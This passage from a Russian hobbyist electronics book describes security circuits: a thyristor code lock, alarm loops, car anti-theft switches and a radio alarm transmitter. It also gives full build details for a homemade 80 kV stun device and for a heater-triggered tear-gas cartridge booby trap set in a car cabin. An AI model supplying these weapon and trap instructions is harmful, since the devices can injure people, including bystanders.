Устройство потребляет в дежурном режиме ток не более 45 мА что при стационарном питании несущественно. Если же требуется автономное питание то можно применить микросхему 537РУ10 или 537РУ8 (рис. 2.19). Она используется как эмулятор ПЗУ для чего программируется по приведенной таблице с выбранным напряжением программирования 5 В. А чтобы результаты переноса программы не были потеряны при отключении питания микросхема переносится в контактную колодку схемы замка с элементом резервного питания (батарея или аккумулятор).
Контрольная сумма запрограммированной микросхемы — 7ADAH (использован программатор КРОТ/РФ).
Кодовый замок на тиристорах
При установке кодового замка не всегда имеется возможность располагать кнопочную панель вблизи от схемы управления. В этом случае применение тиристоров в качестве триггеров запоминающих правильную комбинацию на бранного кода обеспечивает более высокую помехоустойчивость и стойкость к умышленному повреждению по сравнению со схемами собранными только на КМОП микросхемах.
Приведенная на рис 2 20 схема позволяет ограничить доступ в помещение посторонних. Для срабатывания открывающего защелку электромагнита YA1 необходимо в определенной последовательности набрать код из 4 цифр (из 10 возможных).
Работает схема следующим образом. В исходном состоянии на вход управления D1 1/6 через резистор R12 поступает лог 1 и внутренний ключ микросхемы будет замкнут. Нажатие кнопок в последовательности S4 S3 S2 S1 приведет к поочередному открыванию соответствующих тиристоров VS4, VS3, VS2, VS1. Ток через резисторы R8 R10 позволяют удерживать сработавшие тиристоры во включенном состоянии. Причем если при наборе номера ошибочно нажата любая другая кнопка это приведет к срабатыванию ключа на элементе микросхемы D1. 3 что обеспечит появление лог 0 на входе D1. 1/6 — ключ разомкнется и частично правильно набранный код будет сброшен .
При правильном наборе номера появится ток протекающий через резисторы R6 R7 и откроется транзистор VT1. При этом будет подаваться питание на электромагнит YA1. А чтобы электромагнит не находился под напряжением в те чение длительного времени после срабатывания элемент D1. 2 совместно с цепью заряда конденсатора R11 С1 позволяет ограничить продолжительность его работы интервалом 24с. Время определяется номиналом конденсатора С1. Как только напряжение на входе D1 2/12 в процессе заряда конденсатора
Pис. 2.20. Элeктpнчecкaя схема кодового замка
Рис. 2.21. Схема замены транзистора VT1
Рис. 2. 22. Топология печатной платы и расположение элементов
достигнет порога срабатывания ключа, он подаст лог '0" на управление D1.1 что переведет все тиристоры в исходное состояние.
Устройство может работать при изменении питающего напряжения в более широких пределах чем это указано на схеме но его величина выбирается исходя из необходимой для надежного срабатывания применяемого электромагнита. При настройке схемы может потребоваться подбор номиналов резистора R7 и конденсатора С1.
Транзистор VT1 имеет большой коэффициент усиления и может быть заменен двумя обычными включенными по схеме, показанной на рис. 2. 21. Тиристоры могут использоваться с любой последней буквой в обозначении. Конденсаторы применены К50 35 на рабочее напряжение 40 В, а резисторы по дойдут любые.
Кнопка SB1 используется для дистанционного открывания замка внутри помещения и должна быть рассчитана на ток 3 А .
Рис. 2. 23. Подключение сменного кодозадающего штекера Х2
Все элементы схемы кроме трансформатора, диодов VD5 VD8 и электромагнита YA1, расположены на односторонней печатной плате, рис. 2. 22.
Для удобства смены кода и подключения цепей от кнопок набора номера на плате установлены винты М2,5 (как это показано на рисунке), к которым и закрепляют нужный провод. Если же установить дополнительный 16-ти контактный разъем (Х2, рис. 2. 23) со сменным кодозадающим штекером, то смена кода займет несколько секунд (если заранее подготовить штекера с установленными перемычками под нужные комбинации цифр кода) .
Pис. 2. 24. Схема ограничения времени
Один из элементов микросхемы не использован и с его помощью можно выполнить ограничение необходимого времени на набор кода, что дополнительно затруднит подбор кода. Пример варианта такого подключения D1.4 показан на рис. 2.24.
Электрошоковое средство защиты
Устройство предназначено для активной самообороны путем воздействия на нападающего высоковольтным разрядом электротока.
Схема позволяет получить на выходных контактах напряжение до 80000 В, что приводит к пробою воздуха и образованию электрической дуги (искрового разряда) между контактными электродами. Так как при касании электродов протекает ограниченный ток, угрозы для человеческой жизни нет.
Электрошоковое устройство благодаря своим малым размерам может использоваться как индивидуальное средство безопасности или же работать в составе системы охраны для активной защиты металлического объекта (сейфа металлической двери, дверного замка и т.д.). Кроме того, конструкция настоль ко проста, что для изготовления не требует применения промышленного оборудования — все легко выполняется в домашних условиях.
В схеме устройства, рис. 2.25, на транзисторе VT1 и трансформаторе Т1 собран импульсный преобразователь напряжения. Автогенератор работает на частоте 30 кГц, и во вторичной обмотке (3) трансформатора Т1 после выпрямления диодами на конденсаторе С4 выделяется постоянное напряжение около 800...1000 В. Второй трансформатор (Т2) позволяет еще повысить напряжение до нужной величины. Работает он в импульсном режиме. Это обеспечивается регулировкой зазора в разряднике F1 так, чтобы пробой воздуха происходил при напряжении 600...750 В. Как только напряжение на конденсаторе С4 (в процессе заряда) достигнет этой величины, разряд конденсатора проходит через F1 и первичную обмотку Т2.
Энергия, накопленная на конденсаторе С4 (передаваемая во вторичную обмотку трансформатора), определяется из выражения
W = 0.5С х Uc^2 = 0,5 х 0,25 х 10^(-6) х 700^2 = 0,061 [Дж]
где Uc — напряжение на конденсаторе [В], С — емкость конденсатора С4 [Ф].
Рис. 2.25. Электрическая схема
Аналогичные устройства промышленного изготовления имеют примерно такую же энергию заряда или чуть меньше.
Питается схема от четырех аккумуляторов типа Д-0,26 и потребляет ток не более 100 мА. Элементы схемы, выделенные пунктиром, являются бестрансформаторным зарядным устройством от сети 220 В. Для подключения режима подзаряда используется шнур с двумя соответствующими вилками. Светодиод HL1 является индикатором наличия напряжения в сети, а диод VD3 предотвращает разряд аккумуляторов через цепи зарядного устройства, если оно не включено в сеть.
В схеме использованы детали резисторы МЛТ, конденсаторы С1 типа К73-17В на 400 В, С2 — К50-16 на 25 В, СЗ — К10-17, С4 — МБМ на 750 В или типа К42У-2 на 630 В. Высоковольтный конденсатор (С4) применять других типов не рекомендуется, так как ему приходится работать в жестком режиме (разряд почти коротким замыканием), который долго выдерживают только эти серии. Диодный мост VD1 можно заменить четырьмя диодами типа КД102Б, а VD4 и VD5 — шестью последовательно включенными диодами КД102Б. Включатель SA1 типа ПД9-1 или ПД9-2.
Трансформаторы являются самодельными и намотка в них начинается совторичной обмотки. Процесс изготовления потребует аккуратности и намоточного приспособления. Трансформатор Т1 выполняется на диэлектрическом каркасе, вставляемом в броневой сердечник Б26, рис 2.26, из феррита М2000НМ1 (М1500НМ1). Он содержит в обмотке 1 — 6 витков, 2—20 витков проводом ПЭЛШО диаметром 0,18 мм (0,12...0,23 мм), в обмотке 3 — 1800 витков проводом ПЭЛ диаметром 0,1 мм. При намотке 3-й обмотки необходимо через каждые 400 витков укладывать конденсаторную диэлектрическую бумагу, а слои пропитывать конденсаторным или трансформаторным маслом. После намотки катушки вставляем ее в ферритовые чашки и склеиваем стык (предварительно убедившись, что она работает). Места выводов катушки заливаются разогретым парафином или воском.
Рис. 2. 26. Составные части конструкции броневой катушки
Pис. 2. 27. Каркас для намотки высоковольтного трансформатора Т2
При монтаже схемы необходимо соблюдать полярность фаз обмоток трансформатора, указанную на схеме.
Высоковольтный трансформатор Т2 выполнен на пластинах из трансформаторного железа, набранных в пакет, рис. 2.27. Так как магнитное поле в катушке не замкнутое, конструкция позволяет исключить намагничивание сердечника. Намотка выполняется виток к витку (сначала наматывают вторичную обмотку) 2 — 1800... 2000 витков проводом ПЭЛ диаметром 0,08...0,12 мм (в четыре слоя), 1 — 20 витков диаметром 0,35 мм. Межслойную изоляцию лучше выполнять из нескольких витков тонкой (0,1 мм) фторопластовой ленты, но подойдет также и конденсаторная бумага — ее можно достать из высоковольтных неполярных конденсаторов. После намотки обмоток трансформатор заливается эпоксидным клеем. В клей перед заливкой желательно добавить несколько капель конденсаторного масла (пластификатор) и хорошо перемешать. При этом в заливочной массе клея не должно быть пузырьков воздуха. А для удобства заливки потребуется изготовить картонный каркас (размерами 55х23х20 мм) по габаритам трансформатора, где и выполняется герметизация.
Рис. 2.28. Конструкция корпуса
Изготовленный таким образом трансформатор обеспечивает во вторичной обмотке амплитуду напряжения более 90000 В, но включать его без защитного разрядника F2 не рекомендуется, так как при таком напряжении возможен пробой внутри катушки Защитный разрядник выполняется из двух оголенных проводов, расположенных на расстоянии 20...24 мм. Конструкция электродов Х2, ХЗ и разрядника F2 показана на рис. 2.28. Элементы конструкции крепятся на боковых пластинах из оргстекла толщиной 5...6 мм. В качестве электродов Х2 и ХЗ можно использовать стержни от разъемов на большой ток, например из серии ШР.
Вид конструкции разрядника F1 приведен на рис. 2.29. В качестве материала лучше взять медные пластины с никелированным покрытием (этим обеспечивается более высокая стойкость разрядника к разрушению дугой). Толщина пластин может быть любой. Пробойное напряжение воздуха примерно 3 кВ на мм (зависит от влажности и атмосферного давления), поэтому зазор разрядника F1 будет примерно 0,1...0,2 мм (регулируется при настройке). Кнопку включения SB1 лучше также сделать самостоятельно — это позволяет учесть особенность конструкции корпуса. Она выполняется из мягкой стальной или медной ленты толщиной примерно 0,5 мм, рис. 2.30.
Рис. 2.30. Конструкция кнопки включения SB1
Все детали схемы, кроме выключателя SA1, размещены на односторонней печатной плате из стеклотекстолита толщиной 1...1,5 мм (размером 130х55 мм), рис. 2.31. Таких же размеров плата используется как крышка и элемент крепления выключателя SA1, а также аккумуляторов.
Аккумуляторы размещены по двое в картонных стаканах, склеенных по их размерам (по диаметру) и подпружиниваются к основной плате лепестками закрепленными на крышке.
Детали припаиваются со стороны печатных проводников, что позволяет уменьшить толщину корпуса устройства. Трансформаторы Т1 и Т2 приклеиваются к плате эпоксидным клеем.
Общий вид сборки всей конструкции (без кожуха) показан на рис. 2.32. На каркасе, образованном из двух плат, закрепленных четырьмя винтами (с потайной шляпкой), обматывается и склеивается кожух из картона (он должен сни-
маться при снятой задней стенке). Для придания привлекательного внешнего вида кожух обматывается самоклеющейся пленкой под цвет дерева.
В месте расположения кнопки SA1 выполняется отверстие в кожухе, а на боковую грань приклеивается накладка из тонкой (1...2 мм) пластмассы с прорезями.
Рис. 2.31. Топология печатной платы и расположение элементов
Внутри гибкой части пластины клеится резиновый вкладыш, но так, чтобы он не мешал одевать кожух на каркас.
Настройка схемы заключается в получении (резистором R4) устойчивого запуска и работы автогенератора при питании от стационарного источника с напряжением от 3,9 до 5 В. При настройке схемы лучше использовать блок питания в режиме ограничения тока на 1 А — это предотвратит повреждение VT1 в случае ошибочного подключения фазы первичной обмотки Т1 или же отсутствия режима автогенерации по другой причине. После этого с помощью осциллографа с делителем замеряем напряжение на конденсаторе С4 и подбираем величину зазора в разряднике F1 так, чтобы оно не превышало уровня 650...750 В.
Рис. 2.32. Вид сборки конструкции
Теперь несколько слов об эксплуатации устройства. При переносе электрошока лучше воспользоваться выключателем SA1 для снятия питания — это исключит работу устройства при случайном нажатии кнопки SB1, например в кармане. Не рекомендуется включать электрошок в условиях высокой влажности, чтобы самому не попасть под напряжение дугового разряда. Кроме того, так как для транзистора VT1 не установлен теплоотводящий радиатор (нет свободного места в корпусе), не рекомендуется включать устройство на непрерывную работу в течение времени более 1 мин (обычно в этом и нет необходимости). Следует также знать, что обычная одежда не является препятствием для проникновения дуги.
Многоканальная охрана для удаленных объектов
Нередко бывает необходимо охранять от проникновения посторонних удаленные от основного блока охраны помещения. При этом от каждого объекта до пульта охраны прокладывается двухпроводная линия (шлейф). Для надежной работы системы охраны схема должна иметь индикацию любого нарушения цепи охранного шлейфа: обрыв или замыкание, а также срабатывание датчика на объекте. В отличие от многих других описанных в литературе систем охраны, данная схема позволяет различать все эти три состояния, а также надежно контролировать работу охранного шлейфа не только с центрального пульта охраны, но и непосредственно на самом объекте (помещении). Кроме того, схема мало потребляет и предусматривает смешанное питание от сети 220 В и аккумулятора — при пропадании сетевого напряжения питание переходит на аккумулятор.
Рис. 2.33. Электрическая схема блока, устанавливаемого в охраняемом помещении
Принцип действия устройства основан на обнаружении изменения тока в цепи охранного шлейфа. В отличие от наиболее распространенных мостовых схем, данная работает в импульсном режиме, что более экономично. На каждом охраняемом объекте устанавливается активное устройство, собранное по схеме рис. 2.33. К ней может быть подключено много последовательно соединенных датчиков F1...Fn, срабатывающих на разрыв. В этом случае все они подключаются к схеме так, чтобы срабатывание любого из них разрывало всю цепь.
В качестве датчиков могут применяться любые охранные устройства, имеющие релейный выход.
Электрическая схема состоит из автогенератора на элементах микросхемы D1.2 и D1.3 с частотой примерно 2 Гц (его работа подробно описана в первом разделе). С этой же частотой мигает светодиод HL1. В случае, если сработает один из последовательно включенных датчиков, на входе элемента D1.1/6 появится лог. "1" — ключ замкнется, и перестанет работать автогенератор.
Рис. 2.34. Схема центрального пульта охранной сигнализации
В охраняемом помещении индикатором нормального состояния шлейфа сигнализации является мигание светодиода HL1 (при включенном шлейфе данного канала на центральном пульте). Диод VD2 предотвращает повреждение схемы от ошибочного подключения полярности охранного шлейфа при первоначальном подключении системы.
Применение на каждом охраняемом объекте схемы с автогенератором позволяет выполнить центральный пульт довольно простым, при более широких возможностях системы. Схема пульта показана для двух каналов охраны удаленных объектов, рис. 2.34. Все узлы дополнительных каналов идентичны, и поэтому рассмотрим работу всей системы на примере первого канала.
Включение режима охраны нужного объекта (канала) производится соответствующим тумблером 1SA1...nSA1. При этом, если все датчики на охраняемом объекте замкнуты, будут моргать светодиоды 1HL1...nHL1. Эти импульсы через конденсатор 1С1 поступают на базу транзистора 1VT2. Он периодически открывается и разряжает конденсатор 1С2 (точнее можно сказать, что не дает ему зарядиться). Наличие конденсатора исключает случайное срабатывание системы охраны от помех в цепи шлейфа. В случае исчезновения импульсов 1С2 постепенно заряжается до напряжения питания и срабатывает триггер D1.1, что позволяет зафиксировать факт нарушения, даже если оно было кратковременным.
Индикатором нарушения охранного щлейфа является непрерывное свечение светодиода 1HL2 и работа звукового сигнализатора. При этом по состоянию светодиода 1HL1 можно судить о характере нарушения цепи охраны, что очень удобно. Так, при разрыве шлейфа свечения не будет, а в случае непрерывного свечения светодиода — короткое замыкание линии.
Сброс режима оповещения производится тумблером 1SA1 — при выключении своей группой контактов он обнуляет триггер, подавая высокий уровень на вход R.
Рис. 2.35. Источник питания
Источник питания для системы охраны, рис. 2.35, собран по классической схеме и в особых пояснениях не нуждается. Для его изготовления подойдет любой трансформатор мощностью 20...30 Вт, обеспечивающий во вторичной обмотке напряжение 10...12 В и ток до 1 А (в дежурном режиме система потребляет ток не более б мА на каждый включенный канал). Максимальный ток трансформатора должен соответствовать потребляемому звуковым сигнализатором. Транзистор VT1 устанавливается на радиатор.
Настройка схемы пульта заключается в регулировке чувствительности срабатывания транзистора 1VT1 (резистором 1R2) к импульсам от удаленного генератора под реальную линию шлейфа (в других каналах аналогично).
Топология печатной платы для схемы автогенератора, устанавливаемого на охраняемом объекте, показана на рис. 2.36 (она имеет две перемычки).
В схемах применены постоянные резисторы МЛТ, подстроечные (1R2...nR2) многооборотные С5-2. Неполярные конденсаторы типа К10-17, электролитические 1С2...пС2 типа К53-1 на 20 В, а в источнике питания К50-35 на 25 В. В качестве звукового сигнализатора НА1 может использоваться любой из предназначенных для автомобильной сигнализации. Для звукового оповещения можно воспользоваться и обычным динамиком, включенным по схеме с генератором, показанным на рис. 2.37. В этом случае звук будет прерывистым и появится возможность регулировать громкость работы динамика подстроечным резистором.
Рис. 2.36. Топология печатной платы и расположение элементов
Рис. 2.37. Схема подключения
При желании данная схема кроме охранных функций может использоваться и в качестве пожарной сигнализации. Для этого в цепь задающего часто ту резистора R2 последовательно добавляется терморезистор из серии СТ2-19 (15 кОм), а номинал элементов (R2, С2, R3 и R5) изменяется так, чтобы получить частоту 2 Гц при номинале R2=10...15 кОм. Методика расчета номиналов этих элементов приведена в первом разделе.
При этом частота работы автогенератора будет зависеть от температуры в помещении, и, дополнив схему центрального пульта анализатором частоты, можно иметь пожарную сигнализацию в дополнение к обычной охранной.
Использование сетевых проводов в качестве шлейфа охранной сигнализации
Действие устройства основано на том свойстве, что по проводам электрической сети можно передавать высокочастотные колебания с частотой до 150 кГц. Они свободно распространяются до ближайшего трансформатора. Этот же принцип используется при передаче по радиотрансляционным проводам трех станций, две из которых передаются с модуляцией частот 78 и 120 кГц.
При частотах более 150 кГц часть ВЧ энергии начинает излучаться в эфир, создавая помехи. По этой причине применять более высокие частоты для передачи информации по сетевым проводам нецелесообразно.
На охраняемом объекте устанавливается блок устройства, электрическая схема которого показана на рис. 2.38. Она состоит из двух автогенераторов. Первый генератор на элементах микросхемы D1.1 и D1.2 вырабатывает импульсы частотой 2 Гц и модулирует второй генератор (D1.3 и D1.4), работающий на частоте 70 кГц, рис. 2.39. На транзисторе VT1 собран резонансный усилитель. С выхода вторичной обмотки трансформатора пачки ВЧ колебаний через конденсаторы С5 и С6 поступают в сеть.
Устройство питается непосредственно от сети по бестрансформаторной схеме, что позволяет уменьшить его габариты. Подключение выполняется с соблюдением фазировки,указанной на схеме.
При правильном монтаже схема будет работать сразу, а настройка заключается в получении резонанса в контуре катушки L2 на частоте 70 кГц. Проверку схемы лучше выполнять при ее питании от стационарного источника.
В качестве приемника можно воспользоваться схемой усилителя, приведенной на рис. 2.40, а если необходимо получить большую дальность работы, подойдет схема рис. 2.13 с небольшими изменениями во входной цепи и конструкции катушек.
Катушки L1 и L3 одинаковые и выполнены в ферритовых чашках СБ-12 или аналогичных от контуров промежуточной частоты (465 кГц) приемников. Они должны предусматривать возможность настройки с помощью сердечников. Обмотка 1 содержит 160 витков, 2 — 50 витков проводом ПЭЛШО диаметром 0,08 мм.
Pис. 2.38. Электрическая схема блока
Рис. 2.39. Форма сигналов, поясняющих работу схемы
Дроссель L2 содержит 200 витков тем же проводом на ферритовом кольце 600...2000НМ типоразмера К10х6х3 мм. Параметры катушки L4 такие же, как и у показанной на рис. 2.17.
В схемах применены резисторы типа МЛТ, конденсаторы С2 типа К53-18 на 20 В; С5, С6, С7, С8 — типа К73-17В на соответствующее рабочее напряжение. Остальные конденсаторы типа К10-17 или любые малогабаритные.
Рис. 2.40. Блок приемника
Рис. 2.41. Топология печатной платы блока охраны
Топология односторонней печатной платы для схемы блока охраны приведена на рис. 2.41 (пунктиром показаны две перемычки, которые устанавливаются до начала монтажа элементов).
Простые противоугонные устройства
Самое простое сторожевое устройство для автомобиля, из описанных в литературе, показано на рис. 2.42. Схема состоит всего из одного диода, устанавливаемого между генератором напряжения и аккумулятором, а также тумблера SA1.
Рис. 2.42. Простейшее противоугонное устройство
Устройство включается на охрану тумблером и начинает проявлять себя только при попытке завести двигатель — начнет работать клаксон автомобиля, но надежнее, если это будет дополнительно установленный ревун. Перед запуском двигателя владелец должен отключить сторожевой сигнализатор скрытно установленным тумблером.
Диод можно использовать любой на прямой ток не менее 50 А и обратное напряжение не менее 20 В.
Такая схема хотя и привлекательна своей простотой, но обладает рядом недостатков: по характеру появления звука несложно понять место подключения и принцип работы сигнализатора, а при неработающем двигателе спокойно его отключить.
На рис. 2.43 приведена более совершенная схема, использующая ту же самую идею. Дополнительно установленное реле К1 своими контактами самоблокируется и позволяет зафиксировать во включенном состоянии питание ревуна независимо от дальнейших действий угонщика. В таком состоянии схема будет находиться, пока ее не отключат тумблером SA1 или же не разрядится аккумулятор, что, учитывая его большую емкость и относительно небольшое потребление энергии звуковым сигнализатором (0,2...0,3 А), произойдет нескоро.
Если тумблер SA1 применить с двумя группами переключающих контактов, например типа ТЗ, то свободную группу можно использовать в разрыв цепи замка зажигания, для блокировки запуска двигателя.
Диоды VD2 и VD3 подойдут любые на ток не менее 1 А.
Реле К1 лучше использовать в герметичном исполнении, например типа РЭС48А, паспорт РС4.590.202, или аналогичное, на рабочее напряжение 12 В.
Обеспечить фиксацию срабатывания ревуна можно и без помощи реле, рис. 2.44. В этом случае используется электронный коммутатор — тиристор VS1. При однократном срабатывании он будет находиться в открытом состоянии, пока не будет разорвана цепь ревуна. В этой схеме нельзя использовать звуковой сигнализатор, имеющийся в автомобиле, из-за того что принцип его работы подобен зуммеру, — колеблющаяся мембрана связана с группой контактов, которые разрывают цепь катушки. Из-за прерывистости тока через катушку гудка тиристор выключается по окончании действия сигнала на управляющем электроде.
Рис. 2.43. Противоугонное устройство с непрерывной работой ревуна
Рис. 2.44. Электронный способ фиксации срабатывания сигнализации
Схему можно сделать еще проще, если воспользоваться в качестве датчика работы электрооборудования автомобиля токовым реле К1, рис. 2.45. Кроме того, данная схема позволяет подключить дополнительные датчики, срабатывающие на замыкание (F1, F2). Их можно установить на капоте и в багажнике. Появление тока в цепи, где включена обмотка К1, приведет к срабатыванию группы контактов К1.1, которые включат тиристор VS1.
Токовое реле несложно изготовить самостоятельно на основе геркона, рис. 2.46. Геркон потребуется чуть больше, чем наиболее распространенные КЭМ-1 Его можно достать, например, разобрав герконовое реле из серии РПГ-8. На стеклянный баллон наклеивается бумажный каркас и наматываются в два слоя 20 витков проводом марки ПЭВ с диаметром 1,8...2,5 мм. В зависимости от типа применяемого геркона он будет срабатывать при токе более 1,6...4,6 А (наиболее чувствительны герконы с одной группой нормально разо
Рис. 2.45. Использование токового реле в схеме сигнализации
Рис. 2.46. Конструкция токового реле с использованием геркона
мкнутых контактов). При этом внутреннее сопротивление токового реле очень мало и никакого влияния на работу электрооборудования не оказывает.
Еще один вариант включения охранного сигнализатора показан на рис. 2.47. Цепь базы транзистора подключается так, чтобы при замыкании контактов замка зажигания конденсатор С1 начинал заряжаться через диод и резистор R1. Транзистор VT1 открывается, и срабатывает тиристор VS1, включая звуковой сигнализатор.
Рис. 2.47. Вариант включения сигнализации
Такие противоугонные устройства могут использоваться как отдельно, так и в составе многофункциональной сигнализации. Кроме того, благодаря своей простоте они легко устанавливаются на мотоцикл или любое другое транспортное средство, где нет необходимости (или места) для установки более сложной системы охраны. При этом следует поместить все детали устройства в закрытый корпус из диэлектрического материала, чтобы исключить замыкание цепей на корпус и возникновения пожара.
В качестве общего недостатка приведенных схем можно отменить ограниченное число мест, где может быть установлен тумблер выключения охраны. Это увеличивает вероятность его быстрого обнаружения.
Пиропатрон — элемент активной охраны
Как правило, большинство систем охраны не обеспечивают полной сохранности автомобиля, а просто пассивно мешают злоумышленнику осуществить свой план. При этом стоит задача с помощью сирены привлечь внимание окружающих людей или хозяина к попыткам проникновения в салон постороннего или другим действиям вора. Если днем это еще иногда пугает угонщика, то ночью хозяин может крепко спать и не услышит звукового сигнала — ведь воры отключают его в первую очередь. В этом случае может быть полезным применение в составе охранной сигнализации пиропатрона. Это устройство одноразового действия и кроме шумового эффекта может обеспечить задымление салона автомобиля слезоточивым газом. При срабатывании пиропатрона в кабине никому не удастся воспользоваться автомобилем в течение ближайших 10...15 мин.
Купить специально предназначенный для охранной сигнализации пиропатрон промышленного изготовления мне не удалось (хотя они и существуют). По этой причине пришлось заняться его изготовлением самостоятельно.
Вариант простой конструкции для выполнения пиропатрона показан на рис. 2.48 (вид без кожуха). В ее основе используется патрон (диаметром 9 мм со слезоточивым газом или шумового действия) от любого газового пистолета не барабанного типа.
Рис. 2.48. Вид конструкции
Между двумя стенками в углублении закрепляется патрон. Основание его закрывается тонкой слюдой, на которой плотно намотаны 20...23 витка нихромового провода диаметром 0,5 мм. Обмотка сверху закрывается асбестовым слоем. Выводы нихромового нагревателя зажимаются гайками на шпильках. Стенки выполнены из толстого стеклотекстолита или любого другого термостойкого и прочного диэлектрика. Чертеж передней стенки показан на рисунке. Задняя стенка отличается от передней только отсутствием сквозного отверстия в углублении для крепления патрона. На стенках винтами М3х5 крепится кожух, согнутый из тонкой металлической фольги по размерам каркаса.
Такое устройство можно установить в схеме, показанной на рис. 2.42, вместо звукового гудка или параллельно с ним. При подключении пиропатрона к любой другой сигнализации желательно предусмотреть ограничение времени работы обмотки нагревателя интервалом 30...40 с, что исключит напрасный расход энергии аккумулятора. Для срабатывания пиропатрона достаточно питания нагревателя в течении 6...9 с. Для этого может быть использована схема таймера, собранная по любому из двух показанных на рис. 2.49 вариантов. При включении нагревателя (Rн) через схему таймера время, в течение которого на него будет подаваться питание, задается номиналами элементов С1 и R1.
Рис. 2.49. Электрическая cxeмa таймера
По сравнению с автоматическими устройствами для распыления слезоточивого газа из баллончика данное имеет меньшие габариты и более простую конструкцию.
Охрана автомобиля с оповещением по радиоканалу
Устройство может использоваться для охраны любого автомобиля, гаража или другого удаленного до 500...1000 метров объекта.
В условиях города срабатывание звуковой сирены многих раздражает, особенно если это происходит ночью. Более надежным будет подключать охрану к системе оповещения по радиоканалу. Милиция рекомендует не отключать звуковой сигнал, даже если у вас установлена система радиоохраны. Однако ночью она вряд ли привлечет внимание окружающих с целью поимки воров.
Радиосторож состоит из трех основных блоков: передающего, приемногои стационарного источника питания с зарядным устройством для приемника, рис. 2.50. Радиопередатчик управляется блоком временных интервалов и при срабатывании датчиков начинает излучать высокочастотный радиосигнал, модулированный импульсным кодом. Приемник на фоне помех и других сигналов выделяет "свой" и включает звуковое оповещение хозяина. В случае тревоги может включаться также и звуковой сигнализатор, установленный на автомобиле.
Дальность устойчивого приема на открытой местности составляет не менее 1 км, но в условиях большого города из-за отражений и поглощения сигнала препятствиями, а также помех в эфире расстояние может уменьшиться. Чтобы быть уверенным в том, что высокочастотный сигнал нормально принимается приемником в данном месте, при включении блока охраны схема обеспечивает режим проверки радиоканала через 4 мин после установки в режим "охрана". Этого времени вполне хватит, чтобы дойти домой, где включенный приемник устанавливается в удобное место. При необходимости приемник соединяется со стационарным блоком питания. В этом случае может происходить подзаряд аккумуляторов приемника.
Рис. 2.50. Блок-схема системы
Приемник в переносном варианте питается от аккумулятора с напряжением 3...4 В, а передатчик может иметь смешанное питание — от аккумулятора автомобиля и резервной батареи. При использовании трех аккумуляторов типа Д-0,26 непрерывная автономная работа приемника может составлять 118 часов (около пяти суток).
Габаритные размеры блока, устанавливаемого на автомобиле, — 140х140х30 мм, радиоприемника— 127х67х25 мм.
Радиопередатчик
Для работы охранных устройств с оповещением по радиоканалу Государственным комитетом по радиочастотам выделена фиксированная частота 26,945 МГц. А чтобы обеспечить для передатчика ее высокую стабильность в широком температурном диапазоне (-40...+60°С), необходимо использовать кварцевую стабилизацию частоты.
Передатчик собран по классической схеме, рис. 2.51. Высокочастотный сигнал с автогенератора на транзисторе VT1 через промежуточный усилитель на VT2 подается на оконечный усилитель VT4. У промежуточного усилителя коллекторный контур настраивается с помощью сердечника катушки L2 на первую гармонику задающего генератора. Катушка L2 имеет неполное включение, что увеличивает добротность контура. Усилитель на VT2 позволяет уменьшить влияние изменения режима оконечного каскада на работу задающего автогенератора, а также обеспечивает достаточный уровень сигнала для работы усилителя мощности.
Рис. 2.51. Электрическая схема высокочастотной части передатчика
Оконечный усилитель: работает в режиме класса С. Ключевой режим хотя и имеет меньшее усиление, но он самый экономичный при хорошей термоетабильности. Импульсная мощность ВЧ сигнала, подводимого к антенне, около
2 Вт. Для согласования каскада усилителя с низким входным сопротивлением антенны и уменьшения уровня высших гармоник в сигнале применен двухзвенный П-фильтр из элементов C12-L4-C14-L5-C16. Для точной настройки выходного фильтра предусмотрены элементы настройки: С13, С15 и подстроечный сердечник в катушке L4.
Импульсная модуляция ВЧ сигнала осуществляется в каскаде промежуточного усиления при помощи транзистора VT3. Конденсаторы С5 и С6 обеспечивают заваливание фронтов выходного сигнала, рис. 2.52. Это необходимо, чтобы ограничить спектр высокочастотного сигнала (отведенная полоса канала 10кГц).
Рис. 2.52. Форма выходного сигнала передатчика
Выход передатчика соединяется с антенной высокочастотным кабелем с 50-омным "волновым сопротивлением через разъем XW1. Вблизи от антенны расположено согласующее устройство, состоящее из катушки L6 (в экране). Длина соединительного кабеля от согласующего устройства до основного блока составляет 1,64 м или кратна этому значению (3,28 м).
Все остальные элементы высокочастотной части схемы располагаются на печатной плате из одностороннего стеклотекстолита толщиной 1,5...2 мм с размерами 115х35 мм, рис. 2.53, которая помещается в экранированном отсеке корпуса блока охраны.
В схеме применены детали: резисторы типа С2-23, постоянные конденсаторы К10-17, при этом СЗ...С7, С12, С14 и С16 выбираются с минимальным ТКЕ (М75, М47, МЗЗ), подстроечные С13 и С15 типа К4-236 или К4-216. Использован кварцевый резонатор РК169МВ-14ЕП-26945К-В. Катушки выполняются на диэлектрических каркасах диаметром 5 мм, и их вид показан для L1, L2 и L4 на рис. 2.54.
Катушка L5 должна иметь конструкцию, которая обеспечивает её горизонтальное расположение на плате (рис. 2.55) (это снижает влияние полей близко расположенных катушек друг на друга). Намотка выполняется виток к витку проводом ПЭТВ-2 или ПЭЛ-2: L1 содержит 14 витков проводом диаметром 0,23 мм; L2 — 14 витков с отводом от середины, L4 — 10 витков, L5 — 10 витков проводом диаметром 0,42 мм.
Рис. 2.53. Топология печатной платы и расположение элементов высокочастотной
части передатчика
Рис. 2.54. Конструкция катушки
Pис. 2.55. Конструкция катушки
Подстроечные сердечники могут быть из любого высокочастотного феррита с резьбой М4. Катушка дросселя L3, рис. 2.56, выполняется проводом диаметром 0,12 мм на корпусе резистора МЛТ-0,5 с сопротивлением 1...1.8 кОм и содержит 50 витков. После намотки у всех катушек провод фиксируется клеем "Момент", БФ-4. А для того чтобы сердечники катушек от вибрации при эксплуатации системы в жестких условиях не смещались, их до вкручивания в каркас катушки смазываем несохнущим вязким герметиком.
Поляризованное реле К.1 подойдет типа РЭС32Б РС4.520.204, РС4.520.212 или РС4.520.220. Транзистор VT4 можно заменить на КТ925Б.
На корпусе передатчика устанавливается высокочастотное гнездо XW1 (розетка приборная) типа СР-50-73Ф ГУ3.640.073Сп, а на кабеле от согласующего с антенной устройства — вилка кабельная СР-50-74Ф ГУ3.640.706Сп.
Рис. 2.56. Конструкция дросселя L3
Рис. 2.57. Антенна с согласующим устройством
Антенна, рис. 2.57, соединяется с согласующим устройством гибким многожильным проводом (длиной 100...200 мм). Согласующая катушка L6 выполняется на каркасе, рис. 2.54, и содержит 25 витков провода ПЭВ диаметром 0,23 мм. Соединение с блоком передатчика осуществляется высокочастотным кабелем РК50-2-16 или аналогичным.
